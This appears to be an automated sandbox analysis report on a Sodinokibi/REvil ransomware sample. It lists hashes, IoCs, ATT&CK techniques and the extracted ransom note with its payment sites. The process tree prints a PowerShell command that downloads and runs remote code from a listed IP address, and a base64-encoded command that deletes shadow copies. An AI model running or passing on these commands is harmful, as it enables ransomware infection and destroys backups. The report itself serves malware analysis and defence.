sodinokibi | 697fd96092e104056ff21a7acab7b07da036f4e8d6cb9f672814b51be95591ed

General

Target

82d5933a7fe8497bb64008a8ad2bdaa6.bat
Size

220B
MD5

613e281b75ac4b2fdf68a543bf8e3910
SHA1

04cba786c3f966f0b61a930155de7ccfb85e5edb
SHA256

697fd96092e104056ff21a7acab7b07da036f4e8d6cb9f672814b51be95591ed
SHA512

389ba3e5b8d2188f3d1b6acb152607b567c815869ef0435e55e9eaa3ee93e31a692cc647369e21786c56bdd178bc6413f881abfcc2c8b5b38493891a86907dcb

Score

10^/10

ransomware sodinokibi persistence

Malware Config

Extracted

Language

ps1

Source

URLs

ps1.dropper

http://185.103.242.78/pastes/82d5933a7fe8497bb64008a8ad2bdaa6

Extracted

Path

C:\ja1kdhk2-readme.txt

Family

sodinokibi

Ransom Note

---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension ja1kdhk2. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] WE ARE READY TO PUBLISH UR DATA TO PUBLIC ACCESS IF YOU NOT CONTACT US (USE TOR BROWSER TO VIEW) http://dnpscnbaix6nkwvystl3yxglz7nteicqrou3t75tpcc5532cztc46qyd.onion/posts/140?s=61908812b95c5ff1176e968733afaf55 [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practice - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/60709E04D1E2CABE 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/60709E04D1E2CABE Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: kOQebir2nRyc2v4uhp4bVn1/E1aLrQR6/r89UHdvaX+DoihFytxS+8oEEKnGn8S+ ZrA+DOShYSmok8MIAegyCdmEhC4+0lX/NQdrpzJ8D5Ua5O66mFbtgTMTq9bf3jdr tYjSNjxUAndprxufGVUeA4uacn8c0rFgnCFR2cbWfFrnSXtyEM1bube3jCv76/6A xGBkSo3/n+kGDqByZzKvwzlhvgN0RC/BQtx7II5R5+gbj2oMTarVvUvDauU8eZxA 3N+AyHEXc4jzM8pS56PNDwzWUDNhdF1suwMl8C6p4b/GgluZOXd2EXKxliFyjrj3 yU3BotYDFARtAxF0KN6VMduBq3X9ik4z+N9PAndzRueeG91arFZy1247TVrPj+EM CXOBdTjroTJk3Yk72xfRl10GHPTztz0lQUUUl+5YP5pEYIPcoD2mou5lKixaQeCu m4lIiMyriJYxAy+GYGhBGsh8hO6sb7ay8cguJLbNB5NticgxPZRWMu/PNrELJhcK +EXxQwpMD/0E9ufxx+YDVDxeKEsVPtCUOqwPeWfIgsCTGy7/cmjbSAeNwcHOwJOn U/JlhW/9V3C1ov0nDV95n1FaursPbIf9NidKIFKaQlQwTlGSXXbHuwh+8vqZT6Uh xmjXQhxjZJ8IzRSA59Q23Ce0bC7yWUZW4V3Se1rIzl/XtzFD/lf213Al9gOQihf9 05aqKufFhZH6XlXhl89ulyOGRQynZ4cpvFPZ9g9KYkoyIF2TAedScoQoWRMBMvip gSfCdk9woq5DysoVsZxTpXuYHEH/nrtx8tB3IlNCnd3nS1BlVYOnLsf0uD1zpcfQ SdzZGqz+ghwvDAJBp3YTYex75z9c2yP6ecJPQHKDoIwlsqTwBBoaUVwKbTdkj9vM nLrkQrD9D6NxuxHooJ0CN7aaMb5GjyffexjQ4bZRHcfKWhx25WfQdAiRTnk1r6Od U5dNR2jG6QM9TTJIneoHBXwyLgGcc2n5gV9LbrRI3lQh3MOv6t251H8/YaDjcFb3 fA83rpNVP9X91/6hphjMEWtcI3YlwJywaJx6NyCcGj/fVL8cpMgeiVPqegDNH0pw bIyxaYRPm0bsGfRsgt8iN61XkphUYMGieQmR5/f7bqsGg4xowDiT9Lvzv4uwO+lY 3t/4ZM2ervtDbkwBJ8Np1KNPetZScarD27Xuv1tvvP56vryl/av6V5dl/C9KgHCt Vwv7DbNFyQcDizCY1hZhGrJBxTqtxw5LpVSFSwiq+b/+yEtW8BUUfeLvJ0ichcVq 0v9sCCgAtZHUHyDBB9Tap5CfD94= ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damage of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!

URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/60709E04D1E2CABE

http://decryptor.cc/60709E04D1E2CABE

Signatures

Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
ransomware sodinokibi
Blacklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

9 504 powershell.exe

flow	pid	process
9	504	powershell.exe

Modifies extensions of user files 5 IoCs

Ransomware generally changes the extension on encrypted files.

ransomware

Processes:

powershell.exe

description	ioc	process
File renamed	C:\Users\Admin\Pictures\UnpublishPush.tif => \??\c:\users\admin\pictures\UnpublishPush.tif.ja1kdhk2	powershell.exe
File renamed	C:\Users\Admin\Pictures\DisconnectFormat.raw => \??\c:\users\admin\pictures\DisconnectFormat.raw.ja1kdhk2	powershell.exe
File renamed	C:\Users\Admin\Pictures\MeasureDebug.raw => \??\c:\users\admin\pictures\MeasureDebug.raw.ja1kdhk2	powershell.exe
File renamed	C:\Users\Admin\Pictures\ShowFormat.crw => \??\c:\users\admin\pictures\ShowFormat.crw.ja1kdhk2	powershell.exe
File renamed	C:\Users\Admin\Pictures\UnlockResolve.raw => \??\c:\users\admin\pictures\UnlockResolve.raw.ja1kdhk2	powershell.exe

Enumerates connected drives 3 TTPs

Query Registry
T1012

Peripheral Device Discovery
T1120

System Information Discovery
T1082

Modifies service 2 TTPs 4 IoCs

persistence

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

vssvc.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer	vssvc.exe

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

Processes:

powershell.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-1400429095-533421673-2598934218-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\qelnlq610812.bmp"	powershell.exe

Drops file in Program Files directory 31 IoCs

Processes:

powershell.exe

description	ioc	process
File opened for modification	\??\c:\program files\ExportConnect.3gp2	powershell.exe
File opened for modification	\??\c:\program files\RedoRepair.cfg	powershell.exe
File opened for modification	\??\c:\program files\ResetEnter.xlt	powershell.exe
File opened for modification	\??\c:\program files\SaveFind.js	powershell.exe
File opened for modification	\??\c:\program files\SearchProtect.inf	powershell.exe
File opened for modification	\??\c:\program files\CheckpointGroup.php	powershell.exe
File opened for modification	\??\c:\program files\FindMount.dwg	powershell.exe
File opened for modification	\??\c:\program files\PopEdit.tiff	powershell.exe
File opened for modification	\??\c:\program files\SaveUnblock.ADTS	powershell.exe
File opened for modification	\??\c:\program files\UnregisterUnblock.png	powershell.exe
File opened for modification	\??\c:\program files\BlockShow.ppsm	powershell.exe
File opened for modification	\??\c:\program files\JoinMount.dwfx	powershell.exe
File opened for modification	\??\c:\program files\LimitExport.vdw	powershell.exe
File opened for modification	\??\c:\program files\RegisterUninstall.DVR	powershell.exe
File opened for modification	\??\c:\program files\RestoreGet.dotx	powershell.exe
File opened for modification	\??\c:\program files\ReadPublish.vssm	powershell.exe
File opened for modification	\??\c:\program files\DismountWatch.vbs	powershell.exe
File opened for modification	\??\c:\program files\EnableComplete.kix	powershell.exe
File opened for modification	\??\c:\program files\LimitDisable.pptx	powershell.exe
File opened for modification	\??\c:\program files\OpenClose.otf	powershell.exe
File opened for modification	\??\c:\program files\UpdateReceive.tif	powershell.exe
File created	\??\c:\program files\ja1kdhk2-readme.txt	powershell.exe
File opened for modification	\??\c:\program files\ClearUnlock.ttf	powershell.exe
File opened for modification	\??\c:\program files\UninstallReceive.wps	powershell.exe
File opened for modification	\??\c:\program files\UnprotectEnable.odp	powershell.exe
File created	\??\c:\program files (x86)\ja1kdhk2-readme.txt	powershell.exe
File opened for modification	\??\c:\program files\BackupStep.mp3	powershell.exe
File opened for modification	\??\c:\program files\LimitMerge.001	powershell.exe
File opened for modification	\??\c:\program files\ResetExport.rtf	powershell.exe
File opened for modification	\??\c:\program files\UndoSkip.wax	powershell.exe
File opened for modification	\??\c:\program files\UpdateUndo.js	powershell.exe

Suspicious behavior: EnumeratesProcesses 8 IoCs

Processes:

powershell.exepowershell.exe

pid	process
504	powershell.exe
504	powershell.exe
504	powershell.exe
504	powershell.exe
504	powershell.exe
1716	powershell.exe
1716	powershell.exe
1716	powershell.exe

Suspicious use of AdjustPrivilegeToken 7 IoCs

Processes:

powershell.exepowershell.exevssvc.exe

description	pid	process
Token: SeDebugPrivilege	504	powershell.exe
Token: SeDebugPrivilege	504	powershell.exe
Token: SeDebugPrivilege	1716	powershell.exe
Token: SeBackupPrivilege	3868	vssvc.exe
Token: SeRestorePrivilege	3868	vssvc.exe
Token: SeAuditPrivilege	3868	vssvc.exe
Token: SeTakeOwnershipPrivilege	504	powershell.exe

Suspicious use of WriteProcessMemory 6 IoCs

Processes:

cmd.exepowershell.exe

description	pid	process	target process
PID 3288 wrote to memory of 504	3288	cmd.exe	powershell.exe
PID 3288 wrote to memory of 504	3288	cmd.exe	powershell.exe
PID 3288 wrote to memory of 504	3288	cmd.exe	powershell.exe
PID 504 wrote to memory of 1716	504	powershell.exe	powershell.exe
PID 504 wrote to memory of 1716	504	powershell.exe	powershell.exe
PID 504 wrote to memory of 1716	504	powershell.exe	powershell.exe

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\82d5933a7fe8497bb64008a8ad2bdaa6.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:3288

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/82d5933a7fe8497bb64008a8ad2bdaa6');Invoke-LIEITOMPTWTBU;Start-Sleep -s 10000"
2⤵
- Blacklisted process makes network request
- Modifies extensions of user files
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:504

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1716

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Modifies service
- Suspicious use of AdjustPrivilegeToken
PID:3868

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Modify Existing Service

1

T1031

Privilege Escalation

Defense Evasion

Modify Registry

2

T1112

Credential Access

Discovery

Peripheral Device Discovery

Query Registry

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Defacement

1

T1491

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Download Submit
memory/504-8-0x0000000007B90000-0x0000000007B91000-memory.dmp

Filesize
4KB

Download
memory/504-3-0x00000000071E0000-0x00000000071E1000-memory.dmp

Filesize
4KB

Download
memory/504-10-0x0000000008330000-0x0000000008331000-memory.dmp

Filesize
4KB

Download
memory/504-11-0x0000000009B30000-0x0000000009B31000-memory.dmp

Filesize
4KB

Download
memory/504-5-0x0000000007980000-0x0000000007981000-memory.dmp

Filesize
4KB

Download
memory/504-6-0x0000000007BC0000-0x0000000007BC1000-memory.dmp

Filesize
4KB

Download
memory/504-7-0x0000000007C30000-0x0000000007C31000-memory.dmp

Filesize
4KB

Download
memory/504-0-0x0000000000000000-mapping.dmp

Download
memory/504-9-0x0000000008640000-0x0000000008641000-memory.dmp

Filesize
4KB

Download
memory/504-2-0x0000000006B70000-0x0000000006B71000-memory.dmp

Filesize
4KB

Download
memory/504-4-0x0000000007A20000-0x0000000007A21000-memory.dmp

Filesize
4KB

Download
memory/504-12-0x00000000090C0000-0x00000000090C1000-memory.dmp

Filesize
4KB

Download
memory/504-1-0x00000000739D0000-0x00000000740BE000-memory.dmp

Filesize
6.9MB

Download
memory/1716-14-0x00000000739D0000-0x00000000740BE000-memory.dmp

Filesize
6.9MB

Download
memory/1716-13-0x0000000000000000-mapping.dmp

Download
memory/1716-25-0x0000000008F20000-0x0000000008F21000-memory.dmp

Filesize
4KB

Download
memory/1716-27-0x0000000008C70000-0x0000000008C71000-memory.dmp

Filesize
4KB

Download
memory/1716-28-0x00000000094C0000-0x00000000094C1000-memory.dmp

Filesize
4KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads